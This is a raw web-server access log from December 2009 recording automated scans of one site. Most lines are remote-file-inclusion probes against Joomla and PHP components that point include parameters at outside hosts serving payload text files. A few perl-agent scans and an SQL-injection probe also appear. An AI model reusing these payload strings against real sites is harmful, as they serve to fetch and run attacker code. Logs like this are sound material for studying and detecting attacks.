218.5.74.92 - - [13/Dec/2009:12:33:45 -0800] "GET /logs/administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:33:45 -0800] "GET /logs/access_090604.log%20%20/administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:33:57 -0800] "GET /logs/access_090505.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:34:00 -0800] "GET /administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:34:00 -0800] "GET /logs/administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:34:00 -0800] "GET /logs/access_090604.log%20%20/administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:34:06 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:34:06 -0800] "GET /logs/access_080222.log/components/com_performs/performs.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:34:06 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:34:07 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:34:07 -0800] "GET /logs/access_080222.log/components/com_performs/performs.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:34:07 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:34:11 -0800] "GET /logs/access_090712.log%20%20/administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:34:13 -0800] "GET /logs/access_090711.log/components/com_performs/performs.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:34:14 -0800] "GET /logs/access_090711.log/components/com_performs/performs.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:34:23 -0800] "GET /logs/access_090813.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
87.104.34.140 - - [13/Dec/2009:12:34:29 -0800] "GET /logs/access_090715.log//phpads/? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
87.104.34.140 - - [13/Dec/2009:12:34:30 -0800] "GET /phpads/? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
87.104.34.140 - - [13/Dec/2009:12:34:30 -0800] "GET /logs//phpads/? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
87.104.34.140 - - [13/Dec/2009:12:34:30 -0800] "GET /logs/access_090612.log//phpads/? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:12:34:31 -0800] "GET /logs/access_090712.log%20%20/administrator/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.117.45.204 - - [13/Dec/2009:12:34:32 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.freewebtown.com/sexyzzzzz/1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.117.45.204 - - [13/Dec/2009:12:34:34 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.freewebtown.com/sexyzzzzz/1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.117.45.204 - - [13/Dec/2009:12:34:34 -0800] "GET /logs/access_080512.log//components/com_forum/download.php?phpbb_root_path=http://www.freewebtown.com/sexyzzzzz/1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.117.45.204 - - [13/Dec/2009:12:34:42 -0800] "GET /logs/access_090627.log//components/com_forum/download.php?phpbb_root_path=http://www.freewebtown.com/sexyzzzzz/1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
217.79.182.174 - - [13/Dec/2009:12:34:45 -0800] "GET /logs/access_090715.log//phpads/? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.dmulk.com"
217.79.182.174 - - [13/Dec/2009:12:34:46 -0800] "GET /phpads/? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.dmulk.com"
217.79.182.174 - - [13/Dec/2009:12:34:46 -0800] "GET /logs//phpads/? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:35:08 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:35:08 -0800] "GET /logs/access_080222.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:35:09 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:35:14 -0800] "GET /logs/access_090711.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
217.79.182.174 - - [13/Dec/2009:12:35:28 -0800] "GET /logs/access_081124.log//phpads/? HTTP/1.1" 404 - "-" "libwww-perl/5.814" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:35:41 -0800] "GET /logs/access_081002.log%20%20/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:35:42 -0800] "GET /logs/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:35:42 -0800] "GET /errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:35:58 -0800] "GET /logs/access_080828.log%20%20/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [13/Dec/2009:12:36:14 -0800] "GET /errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [13/Dec/2009:12:36:14 -0800] "GET /logs/access_080828.log%20%20/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [13/Dec/2009:12:36:14 -0800] "GET /logs/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:36:23 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:36:23 -0800] "GET /logs/access_081010.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:36:24 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:36:31 -0800] "GET /logs/access_080703.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:36:32 -0800] "GET /logs/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:36:32 -0800] "GET /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:12:36:32 -0800] "GET /logs/access_081010.log%20%20/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
61.47.61.97 - - [13/Dec/2009:12:36:41 -0800] "GET /logs/access_080825.log%20%20/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:36:46 -0800] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.65.57.4 - - [13/Dec/2009:12:37:33 -0800] "GET /logs/access_090416.log//eshop.php?id=' HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:37:45 -0800] "GET /logs/access_080222.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:37:50 -0800] "GET /logs/access_090711.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:37:51 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:37:51 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:37:51 -0800] "GET /logs/access_080222.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:37:56 -0800] "GET /logs/access_090711.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:37:58 -0800] "GET /logs/access_080222.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.117.45.204 - - [13/Dec/2009:12:37:58 -0800] "GET /logs/access_080512.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.freewebtown.com/sexyzzzzz/1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.117.45.204 - - [13/Dec/2009:12:37:58 -0800] "GET /logs/access_090627.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.freewebtown.com/sexyzzzzz/1.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:38:01 -0800] "GET /logs/access_090711.log%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [13/Dec/2009:12:38:10 -0800] "GET /logs/access_080828.log/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.191.237 - - [13/Dec/2009:12:38:19 -0800] "GET /logs/access_080828.log/errors.php?error=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:38 -0800] "GET /logs/access_090822.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:38 -0800] "GET /logs/access_091111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:38 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:39 -0800] "GET /logs/access_091111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:39 -0800] "GET /logs/access_090822.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:40 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:41 -0800] "GET /logs/access_090822.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:41 -0800] "GET /logs/access_091111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:41 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:41 -0800] "GET /logs/access_091111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:41 -0800] "GET /logs/access_090822.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:41 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:41 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14948 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:41 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14948 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:41 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14948 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:41 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14947 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:44 -0800] "GET /logs/access_091111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:44 -0800] "GET /logs/access_090822.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:44 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14947 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:38:44 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:39:14 -0800] "GET /errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:39:14 -0800] "GET /logs/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:39:15 -0800] "GET /logs/access_081010.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:39:23 -0800] "GET /logs/access_080703.log/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:39:51 -0800] "GET /logs/access_090805.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:39:51 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:39:51 -0800] "GET /logs/access_090811.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [13/Dec/2009:12:39:53 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
82.195.252.206 - - [13/Dec/2009:12:39:53 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:12:40:18 -0800] "GET /logs/access_090822.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:12:40:18 -0800] "GET /logs/access_091111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:12:40:18 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14947 "-" "Mozilla/5.0" "www.dmulk.com"
79.136.232.126 - - [13/Dec/2009:12:40:18 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:40:33 -0800] "GET /logs/access_090124.log//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:41:03 -0800] "GET /logs/access_081010.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [13/Dec/2009:12:41:08 -0800] "GET /logs/access_080703.log%20%20/errors.php?error=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:41:21 -0800] "GET /logs/access_090124.log//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:03 -0800] "GET /logs/access_090124.log//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:04 -0800] "GET /logs/access_090124.log//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:42:04 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:42:04 -0800] "GET /logs/access_080919.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:42:04 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:42:05 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:42:05 -0800] "GET /logs/access_080919.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:42:05 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:05 -0800] "GET /logs/access_081120.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:05 -0800] "GET /logs/access_090523.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:06 -0800] "GET /logs/access_081120.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:06 -0800] "GET /logs/access_090523.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:06 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:06 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14947 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:06 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14947 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:06 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:09 -0800] "GET /logs/access_081120.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:09 -0800] "GET /logs/access_090523.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:09 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 14947 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:09 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:12:42:10 -0800] "GET /logs/access_090909.log%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:11 -0800] "GET /logs/access_081120.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:11 -0800] "GET /logs/access_090523.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:12:42:11 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://withkor.net/snapshot/lo1.txt???? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
